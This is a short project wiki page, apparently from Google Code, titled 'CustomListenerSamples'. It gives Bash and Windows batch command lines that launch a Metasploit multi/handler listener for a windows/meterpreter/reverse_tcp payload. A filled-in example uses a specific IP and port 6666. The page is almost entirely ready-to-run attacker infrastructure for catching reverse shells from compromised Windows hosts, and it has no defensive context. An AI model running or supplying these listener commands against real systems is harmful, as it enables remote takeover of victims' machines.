My favorites | Sign in
Project Home Downloads Wiki Issues Source
Search
for
CustomListenerSamples  

Featured
Updated Jul 23, 2010 by mesuttimur@gmail.com

Bash

#!/bin/sh
msfcli3 exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=[YOURIP] LPORT=[PORT] E

Windows Batch

ruby.exe msfcli exploit/multi/handler LHOST=[YOURIP] LPORT=[PORT] PAYLOAD=windows/meterpreter/reverse_tcp E

i.e.

"D:\Program Files\Metasploit\Framework3\bin\ruby.exe" "D:\Documents and Settings\UserXP\Application Data\msf32\msfcli" exploit/multi/handler LHOST=12.12.12.72 LPORT=6666 PAYLOAD=windows/meterpreter/reverse_tcp E

Sign in to add a comment
Powered by Google Project Hosting